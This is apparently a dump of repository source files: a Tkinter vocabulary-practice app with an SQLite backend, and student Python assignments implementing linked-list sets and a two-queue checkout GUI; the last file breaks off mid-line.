'VOCAPY'\n self.labelW.pack(padx=self.padding, pady=self.padding)\n\n # Frame choice buttons\n frameB = tk.Frame(labelFrameApp)\n frameB['bg'] = color\n frameB.pack(padx=self.padding)\n\n # Choice buttons create\n self.radiobuttons = []\n for i in range(4):\n self.radiobuttons.append(tk.Radiobutton(frameB))\n self.radiobuttons[i]['indicatoron'] = 0\n self.radiobuttons[i]['font'] = 'helvetica 16 bold'\n self.radiobuttons[i]['height'] = 2\n self.radiobuttons[i]['width'] = 40\n self.radiobuttons[i]['bg'] = 'Teal'\n self.radiobuttons[i]['fg'] = 'snow'\n self.radiobuttons[i].pack(fill='x', expand='yes', pady=3)\n\n # Choice buttons commands\n self.radiobuttons[0]['command'] = lambda: self.check_guess(\n self.radiobuttons[0])\n self.radiobuttons[1]['command'] = lambda: self.check_guess(\n self.radiobuttons[1])\n self.radiobuttons[2]['command'] = lambda: self.check_guess(\n self.radiobuttons[2])\n self.radiobuttons[3]['command'] = lambda: self.check_guess(\n self.radiobuttons[3])\n\n # Next word button\n self.buttonF = tk.Button(labelFrameApp)\n self.buttonF['command'] = self.practice\n self.buttonF['text'] = '-->'\n self.buttonF['font'] = ('Arial Black', 20, 'bold')\n self.buttonF['bg'] = 'snow'\n self.buttonF['fg'] = 'Teal'\n self.buttonF.pack(\n padx=self.padding,\n pady=self.padding,\n ipadx=10,\n ipady=5\n )\n\n # Percentbar\n self.textS = tk.Text(self)\n self.textS['font'] = 'helvetica 10'\n self.textS['relief'] = 'flat'\n self.textS['height'] = 1\n self.textS.tag_configure('guess', background='#CBE148')\n self.textS.tag_configure('wrong', background='#EEB0AB')\n self.textS.pack(fill='x', expand='yes')\n self.percentbar()\n\n def practice(self, event=None):\n while len(self.word_list) < self.minWords:\n self.list_complete()\n\n # Practice round\n self.gr = PracticeRound(self.word_list)\n\n if DEBUG:\n print(self.gr)\n\n # Display word\n self.labelW['text'] = self.gr.word.name\n\n self.buttonF['state'] = 'disabled'\n self.buttonF.unbind('<Return>')\n\n self.user_guess = tk.StringVar()\n\n # Display choices\n for i in range(4):\n self.radiobuttons[i]['variable'] = self.user_guess\n self.radiobuttons[i]['text'] = self.gr.means[i]\n self.radiobuttons[i]['value'] = self.gr.means[i]\n self.radiobuttons[i]['state'] = 'normal'\n\n self.focus_set()\n\n def check_guess(self, button):\n # Update attempts\n self.gr.word.attempts += 1\n self.session.attempts += 1\n\n # User choice\n guess = self.user_guess.get()\n if guess == self.gr.target:\n button['selectcolor'] = '#CBE148'\n # Update guess\n self.gr.word.guess += 1\n self.session.guess += 1\n result = True\n else:\n button['selectcolor'] = '#EEB0AB'\n result = False\n\n self.gr.word.update_db()\n self.show_result(result)\n self.percentbar()\n\n for i in range(4):\n self.radiobuttons[i]['state'] = 'disabled'\n\n # New practice round\n self.buttonF['state'] = 'normal'\n self.buttonF.bind('<Return>', self.practice)\n self.buttonF.focus_set()\n\n def show_result(self, success):\n title = _('Resultado')\n padl = 4 * ' '\n padr = 12 * ' '\n\n # Messagebox\n if success:\n message = _('\\n{}Resultado: Correcto!{}').format(padl, padr)\n messagebox.showinfo(title, message, parent=self)\n else:\n message = _('{0}Resultado: Incorrecto!{1}\\n{0}{2}: {3}{1}').format(\n padl, padr, self.gr.word.name, self.gr.target)\n messagebox.showerror(title, message, parent=self)\n\n def list_complete(self):\n # Messagebox\n message = _('''El diccionario posee {} términos.\nAntes de jugar debería añadir al menos {} términos al diccionario.\n''').format(len(self.word_list), self.minWords - len(self.word_list))\n messagebox.showinfo(_('Advertencia'), message, parent=self)\n\n self.constructorCall()\n\n def percentbar(self):\n attempts = self.session.attempts\n percent = self.session.percent\n\n start = len(str(attempts)) + len(_('palabras')) + 2\n info = _('{} palabras [{}{} aciertos]').format(attempts, percent, '%')\n\n self.textS['state'] = 'normal'\n self.textS.delete('1.0', tk.END)\n self.textS.insert('1.0', info)\n\n pBar = PercentBar(\n self.textS,\n start=(1, start),\n lenght=30,\n char=' ',\n percent=percent,\n colors=('#CBE148', '#EEB0AB')\n )\n pBar.create()\n\n self.textS['state'] = 'disabled'\n\n def constructorCall(self, event=None):\n self.unbind('<Control-a>')\n constructor = ConstList(self)\n constructor.wait_window()\n self.word_list = constructor.word_list\n self.bind('<Control-a>', self.constructorCall)\n\n def statsCall(self, event=None):\n self.unbind('<Control-e>')\n stats = Stats(self)\n # Check whether stats window was created\n try:\n stats.window.wait_window()\n except AttributeError:\n pass\n finally:\n self.bind('<Control-e>', self.statsCall)\n\n def menuBar(self):\n menuBar = tk.Menu(self)\n self.config(menu=menuBar)\n\n # Archivo\n fileMenu = tk.Menu(menuBar, tearoff=0)\n fileMenu.add_command(\n label=_('Agregar palabras'),\n accelerator='Ctrl+A',\n command=self.constructorCall\n )\n fileMenu.add_command(\n label=_('Eliminar palabra'),\n accelerator='Ctrl+D',\n command=self.delWord\n )\n self.bind('<Control-d>', self.delWord)\n fileMenu.add_command(\n label=_('Borrar todo'),\n command=self.clear\n )\n fileMenu.add_separator()\n\n langMenu = tk.Menu(fileMenu, tearoff=0) # Language\n fileMenu.add_cascade(label=_('Lenguaje'), menu=langMenu)\n langs_lst = [_('español'), _('portugués'), _('inglés')]\n for l in langs_lst:\n langMenu.add_radiobutton(label=l, indicatoron=0,\n command=lambda arg0=l: self.setLang(arg0)\n )\n\n fileMenu.add_separator()\n fileMenu.add_command(\n label=_('Ver estadísticas'),\n accelerator='Ctrl+E',\n command=self.statsCall\n )\n fileMenu.add_separator()\n fileMenu.add_command(\n label=_('Salir'),\n accelerator='Ctrl+Q',\n command=self.destroyWin\n )\n menuBar.add_cascade(label=_('Archivo'), menu=fileMenu)\n\n # Ayuda\n helpMenu = tk.Menu(menuBar, tearoff=0)\n helpMenu.add_command(\n label=_('Ayuda'),\n accelerator='F1',\n command=lambda: self.openUrl(self.urlHelp)\n )\n helpMenu.add_command(label=_('Sobre'), command=self.about)\n menuBar.add_cascade(label=_('Ayuda'), menu=helpMenu)\n\n def openUrl(self, url, event=None):\n webbrowser.open(url)\n\n def about(self):\n \"\"\"About messagebox\"\"\"\n\n title = _('Sobre')\n message = \"\"\"\n VocaPy\n v{}\n\n MIT License (MIT)\nCopyright (c) 2014 Alejandro Druetta\\t\n https://github.com/aledruetta/vocapy\n \"\"\".format(self.version)\n messagebox.showinfo(title, message, parent=self)\n\n def setLang(self, arg0):\n if arg0 == _('español'):\n self.lang = 'es_AR'\n elif arg0 == _('portugués'):\n self.lang = 'pt_BR'\n elif arg0 == _('inglés'):\n self.lang = 'en_US'\n\n self.cf_dict.save('lang', self.lang)\n self.i18n()\n self.menuBar()\n self.percentbar()\n\n if DEBUG:\n print('\\nmenu: {}\\n'.format(self.lang))\n\n def delWord(self, event=None):\n m = _('Está seguro de que quiere eliminar {} del diccionario?').format(\n self.gr.word.name)\n t = _('Eliminar Palabra')\n if messagebox.askokcancel(t, m, default='cancel', parent=self):\n self.word_list.remove_db(self.gr.word)\n if DEBUG:\n print(\"\\n\", self.word_list)\n\n self.practice()\n\n def clear(self):\n m = _('Está seguro de que quiere eliminar el diccionario?')\n t = _('Eliminar Diccionario')\n if messagebox.askokcancel(t, m, default='cancel', parent=self):\n self.word_list.clear()\n\n self.practice()\n\n def destroyWin(self, event=None):\n self.session.append_db()\n if DEBUG:\n print(\"\\n{}\\n\".format(Session.sessions_lst()))\n self.destroy()\n\n def i18n(self):\n \"\"\"\n Localization:\n 1. 'string' to _('string')\n 2. File's list to potfiles.in\n 3. To create .pot file:\n $ xgettext --files-from=potfiles.in --directory=../.. \\\n --output=messages.pot --language=Python --from-code=utf-8\n 4. Edit message.pot with poedit\n 5. Put in locale/lang/LC_MESSAGES/\n 6. To update:\n $ msgmerge --update --no-fuzzy-matching --buckup=off \\\n ../../locale/lang/LC_MESSAGES/messages.po messages.pot\n Edit message.po with poedit\n \"\"\"\n\n try:\n lang = gettext.translation('messages', localedir='locale',\n languages=[self.lang])\n except (OSError, AttributeError) as err:\n lang = gettext.NullTranslations()\n if DEBUG:\n print(\"\\nError: {}\".format(err))\n lang.install()\n\n\ndef main():\n root = VocapyApp()\n root.mainloop()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5518292784690857,
"alphanum_fraction": 0.5611661672592163,
"avg_line_length": 28.48314666748047,
"blob_id": "b9d69deae967c54c7ad0aae4ee887a5a15b886d9",
"content_id": "2df78f12cadd30e81b391ad7290b7a419dcd347e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5249,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 178,
"path": "/constructor.py",
"repo_name": "aledruetta/vocapy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Script Name: constructor.py\n# Author: Alejandro Druetta\n# Version: 0.4\n#\n# Description: Aplicación para el aprendizaje de vocabulario de\n# lenguas extranjeras.\n\nimport tkinter as tk\nimport sqlite3 as sql\nfrom tkinter import messagebox\nfrom classes import VocapyWord\nfrom classes import DEBUG\n\n\nclass ConstList(tk.Toplevel):\n\n def __init__(self, master):\n super().__init__(master)\n self.word_list = master.word_list\n\n # Window geometry\n self.title(_('Constructor'))\n self.resizable(0, 0)\n self.padding = 20\n\n self.bind('<Control-q>', self.destroyWin)\n\n # Interface\n self.entryWord()\n self.entryMeans()\n self.clear()\n\n def destroyWin(self, event):\n self.destroy()\n\n def entryWord(self):\n labelframeW = tk.LabelFrame(self)\n labelframeW.grid(row=0, column=0, sticky='ew')\n\n frameW = tk.Frame(labelframeW)\n frameW.pack(fill='x', expand='yes', padx=self.padding,\n pady=self.padding)\n\n labelW = tk.Label(frameW)\n labelW['text'] = _('Palabra:')\n labelW.pack(side='left')\n\n self.entryW = tk.Entry(frameW)\n self.entryW.pack(side='left', fill='x', expand='yes',\n padx=self.padding/2, ipady=2)\n\n self.buttonW = tk.Button(frameW)\n self.buttonW['text'] = '+'\n self.buttonW.pack(side='left')\n\n def entryMeans(self):\n labelframeM = tk.LabelFrame(self)\n labelframeM.grid(row=1, column=0)\n\n frameM1 = tk.Frame(labelframeM)\n frameM1.grid(row=0, column=0, sticky='nw', padx=self.padding,\n pady=self.padding)\n\n labelM = tk.Label(frameM1)\n labelM['text'] = _('Significado:')\n labelM.pack(side='left')\n\n self.entryM = tk.Entry(frameM1)\n self.entryM['width'] = 20\n self.entryM.bind('<Return>', self.addmean)\n self.entryM.pack(side='left', ipady=2, padx=self.padding/2)\n\n self.buttonM = tk.Button(frameM1)\n self.buttonM['text'] = '+'\n self.buttonM['command'] = self.addmean\n self.buttonM.pack(side='left')\n\n frameM2 = tk.Frame(labelframeM)\n frameM2.grid(row=0, column=1)\n\n self.listboxM = tk.Listbox(frameM2)\n self.listboxM['width'] = 20\n self.listboxM.pack()\n\n labelframeF = tk.LabelFrame(self)\n labelframeF.grid(row=2, column=0, sticky='ew')\n\n frameF = tk.Frame(labelframeF)\n frameF.pack(fill='x', expand='yes', padx=self.padding,\n pady=self.padding)\n\n self.labelF = tk.Label(frameF)\n self.labelF['font'] = 'Arial 9 italic'\n lenght = len(self.word_list)\n self.labelF['text'] = str(lenght) + _(' palabras')\n self.labelF.pack(side='left')\n\n self.buttonA = tk.Button(frameF)\n self.buttonA['text'] = _('Avanzar')\n self.buttonA['command'] = self.forward\n self.buttonA['width'] = 8\n self.buttonA.pack(side='right')\n\n self.buttonL = tk.Button(frameF)\n self.buttonL['text'] = _('Limpiar')\n self.buttonL['command'] = self.clear\n self.buttonL['width'] = 8\n self.buttonL.pack(side='right')\n\n def addname(self, event=None):\n entry_get = self.entryW.get().upper()\n if entry_get:\n self.entryW.unbind('<Return>')\n self.buttonW.deletecommand(str(self.buttonW.cget('command')))\n\n self.entryW['fg'] = 'red'\n self.word.name = entry_get\n self.entryW.delete(0, tk.END)\n self.entryW.insert(0, self.word.name)\n self.entryW['state'] = 'readonly'\n\n self.entryM['state'] = 'normal'\n self.entryM.focus_set()\n self.buttonM['state'] = 'normal'\n\n def addmean(self, event=None):\n mean = self.entryM.get().lower()\n if mean:\n self.word.means.append(mean)\n self.listboxM.insert(0, ' {}'.format(mean))\n self.entryM.delete(0, tk.END)\n self.buttonA['state'] = 'normal'\n\n def clear(self):\n self.entryW.focus_set()\n self.entryW.bind('<Return>', self.addname)\n self.entryW['state'] = 'normal'\n self.entryW.delete(0, tk.END)\n self.entryW['fg'] = 'black'\n\n self.buttonW['command'] = self.addname\n\n self.entryM['state'] = 'disabled'\n self.entryM.delete(0, tk.END)\n self.buttonM['state'] = 'disabled'\n\n self.listboxM.delete(0, tk.END)\n\n self.buttonA['state'] = 'disabled'\n\n # Empty word for constructor\n self.word = VocapyWord(None, 0.0, 0, 0, list())\n\n def forward(self):\n try:\n self.word_list.append_db(self.word)\n except sql.IntegrityError:\n message = _('No es posible adicionar palabras o significados \\\nrepetidos a la base de datos.')\n messagebox.showinfo(_('Advertencia'), message, parent=self)\n\n lenght = len(self.word_list)\n self.labelF['text'] = str(lenght) + _(' palabras')\n\n self.clear()\n\n if DEBUG:\n print(\"\\n\", self.word_list)\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5346628427505493,
"alphanum_fraction": 0.5422602295875549,
"avg_line_length": 25.325000762939453,
"blob_id": "d7cbe1ad4bb28f2dc6d1daa7753b442675e55ae9",
"content_id": "72e4bce2063ebf7c03bb968b12d1b51bd5806b4d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1053,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 40,
"path": "/tools/db/populate_db.py",
"repo_name": "aledruetta/vocapy",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python3\n\nimport sqlite3 as sql\nimport csv\n\n_database = '../../database.db'\n\n\ndef populate_db():\n \"\"\"\n Populates database.db para pruebas.\n \"\"\"\n\n words = list()\n\n with open('dict.txt', newline='') as csvfile:\n for row in csv.reader(csvfile):\n word, last_time, attempts, guess = row[:4]\n means = set(row[4:])\n words.append((word, 0.0, 0, 0, means))\n\n conn = sql.connect(_database)\n with conn:\n cur = conn.cursor()\n cur.execute(\"PRAGMA foreign_keys = ON\")\n for word, last_time, attempts, guess, means in words:\n cur.execute(\"INSERT INTO words VALUES (?, ?, ?, ?)\",\n (word, last_time, attempts, guess))\n for mean in means:\n cur.execute(\"INSERT INTO means VALUES(?, ?)\", (word, mean))\n conn.commit()\n print(cur.execute(\"SELECT * FROM words\").fetchall())\n print(cur.execute(\"SELECT * FROM means\").fetchall())\n\n\ndef main():\n populate_db()\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6620824933052063,
"alphanum_fraction": 0.6620824933052063,
"avg_line_length": 17.851852416992188,
"blob_id": "48f5b0a7b15dccc48160fd5b148a2396e0151f31",
"content_id": "c79a1884d7698269ecb536d95c69f446f7354d55",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 509,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 27,
"path": "/schema.sql",
"repo_name": "aledruetta/vocapy",
"src_encoding": "UTF-8",
"text": "CREATE TABLE words\n(\n word_ID TEXT PRIMARY KEY NOT NULL,\n last_time REAL,\n attempts INTEGER NOT NULL,\n guess INTEGER NOT NULL\n);\n\nCREATE TABLE means\n(\n word_ID TEXT NOT NULL REFERENCES words(word_ID),\n mean_ID TEXT NOT NULL,\n PRIMARY KEY (word_ID, mean_ID)\n);\n\nCREATE TABLE sessions\n(\n time_ID REAL PRIMARY KEY NOT NULL,\n attempts INTEGER NOT NULL,\n guess INTEGER NOT NULL\n);\n\nCREATE TABLE configs\n(\n conf_ID TEXT PRIMARY KEY NOT NULL,\n value TEXT NOT NULL\n);\n"
}
] | 6 |
moonstar-x-edu/cc1002-fcfm | https://github.com/moonstar-x-edu/cc1002-fcfm | 5699daa8306e66d0665392eea9a1a3b0ee736f65 | 783b2df3151fdcdf4564df7df35b3917ed52cab6 | 2942458f4990b1d50b799b21e2494f4769e8925b | refs/heads/master | 2021-10-09T01:17:31.248463 | 2018-12-19T17:16:47 | 2018-12-19T17:16:47 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6407857537269592,
"alphanum_fraction": 0.6653748750686646,
"avg_line_length": 41.522727966308594,
"blob_id": "c4163cca851132f3772729668e51bf5a004efb92",
"content_id": "93f54132e455b4844edf86b8c5b0c61bf387ebe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7483,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 176,
"path": "/Tareas/Tarea 02/conjunto.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "# modulo: lista.py\n# modulo: lista.py\nimport estructura\n\n#lista: valor(any) siguiente(lista)\nestructura.crear(\"lista\",\"valor siguiente\")\nlistaVacia=None #lista sin valores\n\n#cabeza: lista -> any\n#primer valor de una lista\n#ej: cabeza(lista(\"a\",lista(\"b\",None)))->\"a\"\ndef cabeza(L):\n assert type(L)==lista\n return L.valor\nassert cabeza(lista(\"a\",lista(\"b\",None)))==\"a\"\n\n#cola: lista -> lista\n#devuelve lista sin primer valor\n#ej: cola(lista(\"a\",lista(\"b\",None)))->lista(\"b\",None)\n#ej: cola(lista(\"a\",None))->None\ndef cola(L):\n assert type(L)==lista\n return L.siguiente\nassert cola(lista(\"a\",lista(\"b\",None))) == lista(\"b\",None)\nassert cola(lista(\"a\",None))==None\n\n#esLista: lista -> bool\n#True si L es una lista\n#ej: esLista(lista(1,None)) -> True\n#ej: esLista(0) -> False\ndef esLista(L) :\n return type(L) == lista or L == None\nassert esLista(lista(1, None))\nassert not esLista(0)\n\n#enLista: any lista -> bool\n#True si x esta en L\n#ej: si L=lista(4,lista(5,None)) entonces\n# enlista(5,L)->True, enLista(3,L)->False\ndef enLista(x,L):\n assert esLista(L)\n if L==None: return False\n if cabeza(L)==x: \n return True\n else: \n return enLista(x,cola(L))\nL=lista(4,lista(5,None))\nassert enLista(5,L)\nassert not enLista(3,L)\n\n# modulo: conjunto.py\n\n# esConjunto : lista -> bool\n# True si la lista entregada forma un conjunto (no se aceptan elementos repetidos).\n# ej: esConjunto(lista(1, lista(2, None))) -> True\n# ej: esConjunto(lista(1, lista(1, None))) -> False\ndef esConjunto(x) :\n assert esLista(x)\n if x == None : return True\n if enLista(cabeza(x), cola(x)) : return False\n else : return esConjunto(cola(x))\nassert esConjunto(lista(1, lista(2, None)))\nassert not esConjunto(lista(1, lista(1, None)))\n\n# pertenece : int, lista -> bool\n# True si el primer argumento pertenece al conjunto (segundo argumento).\n# ej: pertenece(1, lista(1, lista(2, None))) -> True\n# ej: pertenece(3, lista(1, lista(2, None))) -> False\ndef pertenece(a, x) :\n assert esConjunto(x) and type(a) == int\n return enLista(a, x)\nassert pertenece(1, lista(1, lista(2, None)))\nassert not pertenece(3, lista(1, lista(2, None)))\n\n# cardinal : lista -> int\n# Entrega el cardinal (numero de elementos) de un conjunto dado.\n# ej: cardinal(lista(1, lista(2, None))) -> 2\n# ej: cardinal(lista(1, lista(2, lista(3, None)))) -> 3\ndef cardinal(x) :\n assert esConjunto(x)\n # contarElementos() se encarga de contar los elementos dentro del conjunto, esta funcion interna sirve para proteger el valor i del usuario)\n def contarElementos(x, i=0) :\n if x == None : return i\n return contarElementos(cola(x), i+1)\n return contarElementos(x)\nassert cardinal(lista(1, lista(2, None))) == 2\nassert cardinal(lista(1, lista(2, lista(3, None)))) == 3\n\n# sub : lista, lista -> bool\n# True si el primer conjunto dado es subconjunto del segundo conjunto.\n# ej: sub(lista(1, None), lista(1, lista(2, None))) -> True\n# ej: sub(lista(1, None), lista(2, lista(3, None))) -> False\ndef sub(x, y) :\n assert esConjunto(x) and esConjunto(y)\n if x == None : return True\n if pertenece(cabeza(x), y) : return sub(cola(x), y)\n else : return False\nassert sub(lista(1, None), lista(1, lista(2, None)))\nassert not sub(lista(1, None), lista(2, lista(3, None)))\n\n# igual : lista, lista -> bool\n# True si los dos conjuntos dados son iguales.\n# ej: igual(lista(1, lista(2, None)), lista(1, lista(2, None))) -> True\n# ej: igual(lista(1, lista(2, None)), lista(1, lista(2, lista(3, None)))) -> False\ndef igual(x, y) :\n assert esConjunto(x) and esConjunto(y)\n if sub(x, y) and sub(y, x) : return True\n else : return False\nassert igual(lista(1, lista(2, None)), lista(1, lista(2, None)))\nassert not igual(lista(1, lista(2, None)), lista(1, lista(2, lista(3, None))))\n\n# aString : lista -> str\n# Transforma un conjunto (lista) a un string con los elementos separados por un espacio.\n# ej: aString(lista(1, lista(2, None))) -> \"1 2\"\n# ej: aString(lista(1, None)) -> \"1\"\ndef aString(x) :\n assert esConjunto(x)\n if x == None : return \"\"\n if cola(x) == None : return str(cabeza(x))\n else : return str(cabeza(x)) + \" \" + aString(cola(x))\nassert aString(lista(1, lista(2, None))) == \"1 2\"\nassert aString(lista(1, None)) == \"1\"\n\n# union : lista, lista -> lista\n# Recibe dos conjuntos y entrega la union entre ellos. (Los entrega en el orden inverso del que fueron entregados).\n# ej: union(lista(1, lista(2, None)), lista(3, lista(4, None))) -> lista(4, lista(3, lista(2, lista(1, None))))\n# ej: union(lista(1, lista(2, lista(3, None))), lista(2, lista(4, None))) -> lista(4, lista(2, lista(3, lista(1, None))))\ndef union(x, y) :\n assert esConjunto(x) and esConjunto(y)\n # unir() se encarga de unir los dos conjuntos con un parametro por omision, es funcion interna para proteger el valor resultado del usuario.\n def unir(x, y, resultado=None) :\n if x == None : \n if y == None : return resultado\n resultado = lista(cabeza(y), resultado)\n return unir(None, cola(y), resultado)\n if pertenece(cabeza(x),y) : return unir(cola(x), y, resultado)\n else: \n resultado = lista(cabeza(x), resultado)\n return unir(cola(x), y, resultado)\n return unir(x, y)\nassert union(lista(1, lista(2, None)), lista(3, lista(4, None))) == lista(4, lista(3, lista(2, lista(1, None))))\nassert union(lista(1, lista(2, lista(3, None))), lista(2, lista(4, None))) == lista(4, lista(2, lista(3, lista(1, None))))\n\n# inter : lista, lista -> lista\n# Recibe dos conjuntos y entrega la interseccion entre ellos. (Los entrega en el orden inverso del que fueron entregados).\n# ej: inter(lista(1, lista(2, lista(3, None))), lista(1, lista(3, lista(4, None)))) -> lista(1, lista(3, None))\n# ej: inter(lista(1, lista(2, None)), lista(1, lista(2, None))) -> lista(2, lista(1, None))\n# ej: inter(lista(1, lista(2, None)), lista(3, lista(4, None))) -> None\ndef inter(x, y) :\n assert esConjunto(x) and esConjunto(y)\n # intersectar() se encarga de intersectar los dos conjuntos con un parametro por omision, es funcion interna para proteger el valor resultado del usuario.\n def intersectar(x, y, resultado=None) :\n if x == None : return resultado\n if pertenece(cabeza(x),y) :\n resultado = lista(cabeza(x), resultado)\n return intersectar(cola(x), y, resultado)\n return intersectar(x, y)\nassert inter(lista(1, lista(2, lista(3, None))), lista(1, lista(3, lista(4, None)))) == lista(3, lista(1, None))\nassert inter(lista(1, lista(2, None)), lista(1, lista(2, None))) == lista(2, lista(1, None))\nassert inter(lista(1, lista(2, None)), lista(3, lista(4, None))) == None\n\n# resta : lista, lista -> lista\n# Recibe dos conjuntos y entrega la resta entre ellos. (Los entrega en el orden inverso del que fueron entregados).\n# ej: resta(lista(1, lista(2, None)), lista(2, lista(3, None))) -> lista(1, None)\n# ej: resta(lista(1, lista(2, lista(3, None))), lista(3, lista(4, None))) -> lista(1, lista(2, None))\ndef resta(x, y) :\n assert esConjunto(x) and esConjunto(y)\n # restar() se encarga de hacer la resta de los dos conjuntos con un parametro por omision, es funcion interna para proteger el valor resultado del usuario.\n def restar(x, y, resultado=None) :\n if x == None : return resultado\n if not pertenece(cabeza(x),y) :\n resultado = lista(cabeza(x), resultado)\n return restar(cola(x), y, resultado)\n return restar(x, y)\nassert resta(lista(1, lista(2, None)), lista(2, lista(3, None))) == lista(1, None)\nassert resta(lista(1, lista(2, lista(3, None))), lista(3, lista(4, None))) == lista(2, lista(1, None))"
},
{
"alpha_fraction": 0.6759065985679626,
"alphanum_fraction": 0.7027928233146667,
"avg_line_length": 35.7952766418457,
"blob_id": "4555e6a841f3a582622f383d248216803602b5a6",
"content_id": "eb03cb59d15fd7feabfd76b946cf91d11ff0fd0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4798,
"license_type": "no_license",
"max_line_length": 202,
"num_lines": 127,
"path": "/Tareas/Tarea 04/parte2.py",
"repo_name": "moonstar-x-edu/cc1002-fcfm",
"src_encoding": "UTF-8",
"text": "from Tkinter import *\r\nfrom Cola import *\r\nfrom time import time\r\n\r\n# Colas\r\ncola1 = Cola(5)\r\ncola2 = Cola(10)\r\ntiempo1 = Cola(cola1.max)\r\ntiempo2 = Cola(cola2.max)\r\ntiempoInicial = time()\r\n\r\n# Funciones Datos\r\n# loggingCola : ->\r\n# Imprime en la consola los clientes y sus tiempos de llegada correspondientes cada vez que se hace un cambio en la cola.\r\ndef loggingCola() :\r\n print \"Cola(s) modificadas...\"\r\n print \" - Clientes en Cola 1:\", str(cola1)\r\n print \" - Clientes en Cola 2:\", str(cola2)\r\n print \" - Tiempos de llegada 1:\", str(tiempo1)\r\n print \" - Tiempos de llegada 2:\", str(tiempo2)\r\n\r\n# actualizarReloj: ->\r\n# Actualiza el labelReloj, debe ser llamado al final de cada funcion evento. Debe llamarse al final de atenderCola() y agregarCola() [eventos].\r\ndef actualizarReloj() :\r\n tiempoActual = int(time() - tiempoInicial)\r\n labelReloj.config(text=\"Reloj: \" + str(tiempoActual))\r\n return\r\n\r\n# actualizarLargoCola: ->\r\n# Actualiza los labelLargoCola1 y labelLargoCola2 cada vez que se realiza un cambio en las colas 1 y 2 respectivamente. Debe llamarse al final de atenderCola() y agregarCola() [eventos].\r\ndef actualizarLargoCola() :\r\n labelLargoCola1.config(text=len(cola1))\r\n labelLargoCola2.config(text=len(cola2))\r\n return\r\n\r\n# actualizarNombreClientes: ->\r\n# Actualiza los labelClientesEsperando1 y labelClientesEsperando2 cada vez que se realiza un cambio en las colas 1 y 2 respectivamente. Debe llamarse al final de atenderCola() y agregarCola() [eventos].\r\ndef actualizarNombreClientes() :\r\n labelClientesEsperando1.config(text=str(cola1))\r\n labelClientesEsperando2.config(text=str(cola2))\r\n return\r\n\r\n# atenderCaja: ->\r\n# Realiza la accion de atender al primero de la cola 1, si esta cola esta vacia, entonces se atiende al primero de la cola 2.\r\ndef atenderCaja() :\r\n assert isinstance(cola1, Cola) and isinstance(cola2, Cola)\r\n if not cola1.vacia() :\r\n labelAtendiendo.config(text=\"Atendiendo a: \" + str(cola1.sacar()))\r\n tiempoEsperado = int((time() - tiempoInicial) - tiempo1.sacar())\r\n labelSegundos.config(text=\"Segundos que espero: \" + str(tiempoEsperado))\r\n else :\r\n labelAtendiendo.config(text=\"Atendiendo a: \" + str(cola2.sacar()))\r\n tiempoEsperado = int((time() - tiempoInicial) - tiempo2.sacar())\r\n labelSegundos.config(text=\"Segundos que espero: \" + str(tiempoEsperado))\r\n \r\n loggingCola()\r\n actualizarNombreClientes()\r\n actualizarLargoCola()\r\n actualizarReloj()\r\n return\r\n\r\n# agregarCliente: Cola, Cola, Entry ->\r\n# Agrega el cliente especificado en la entrada(Entry) a la cola(Cola) y su tiempo de llegada a tiempo(Cola).\r\ndef agregarCliente(cola, tiempo, entrada) :\r\n nombre = entrada.get()\r\n if not nombre == \"\":\r\n cola.poner(nombre)\r\n tiempo.poner(int(time() - tiempoInicial))\r\n entrada.delete(0, END)\r\n\r\n loggingCola()\r\n actualizarNombreClientes()\r\n actualizarLargoCola()\r\n actualizarReloj() \r\n return\r\n\r\n# Ventana\r\nventana = Tk()\r\nancho = 20\r\n\r\n# Marcos\r\nfila1 = Frame(ventana)\r\nfila1.pack()\r\nfila2 = Frame(ventana)\r\nfila2.pack()\r\nfila3 = Frame(ventana)\r\nfila3.pack()\r\nfila4 = Frame(ventana)\r\nfila4.pack()\r\n\r\n# Items Marco 1\r\nbotonCaja = Button(fila1, text=\"Caja\", width=ancho, command=atenderCaja)\r\nbotonCaja.grid(row=0, column=0)\r\nlabelAtendiendo = Label(fila1, width=ancho)\r\nlabelAtendiendo.grid(row=0, column=1)\r\nlabelSegundos = Label(fila1, width=ancho)\r\nlabelSegundos.grid(row=0, column=2)\r\nlabelReloj = Label(fila1, width=ancho)\r\nlabelReloj.grid(row=0, column=3)\r\n\r\n# Items Marco 2\r\nLabel(fila2, text=\"Cola\", width=ancho).grid(row=1, column=0)\r\nLabel(fila2, text=\"Clientes en la cola\", width=ancho).grid(row=1, column=1)\r\nLabel(fila2, text=\"Largo de la cola\", width=ancho).grid(row=1, column=2)\r\nLabel(fila2, text=\"Cliente que llega\", width=ancho).grid(row=1, column=3)\r\n\r\n# Items Marco 3\r\nLabel(fila3, text=\"Cola 1\", width=ancho).grid(row=2, column=0)\r\nlabelClientesEsperando1 = Label(fila3, width=ancho)\r\nlabelClientesEsperando1.grid(row=2, column=1)\r\nlabelLargoCola1 = Label(fila3, text=0, width=ancho)\r\nlabelLargoCola1.grid(row=2, column=2)\r\nnombreCola1 = Entry(fila3, width=ancho)\r\nnombreCola1.bind(\"<Return>\", (lambda evento: agregarCliente(cola1, tiempo1, nombreCola1)))\r\nnombreCola1.grid(row=2, column=3)\r\n\r\n# Items Marco 4\r\nLabel(fila4, text=\"Cola 2\", width=ancho).grid(row=3, column=0)\r\nlabelClientesEsperando2 = Label(fila4, width=ancho)\r\nlabelClientesEsperando2.grid(row=3, column=1)\r\nlabelLargoCola2 = Label(fila4, text=0, 